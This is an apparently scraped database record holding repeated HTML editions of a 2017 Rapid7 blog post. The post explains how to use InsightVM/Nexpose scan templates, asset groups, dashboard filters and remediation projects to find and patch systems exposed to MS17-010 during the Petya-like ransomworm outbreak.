alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" 
href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" 
data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 
0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. 
If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:e11d68b4-bb44-4417-8360-8e6ed76a3e01] -->", "published": "2017-06-28T00:44:35", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "lastseen": "2017-06-28T04:20:16", "viewCount": 5, "enchantments": {}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}, {"lastseen": "2017-06-28T06:20:00", "differentElements": ["description", "modified", "published"], "edition": 2, "bulletin": {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [], "modified": "2017-06-28T02:25:32", "type": "rapid7community", "description": "<!-- [DocumentBodyStart:ef999f6f-5339-4887-b822-6763b7e99b36] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. 
It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img 
alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". 
Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" 
href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" 
data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" 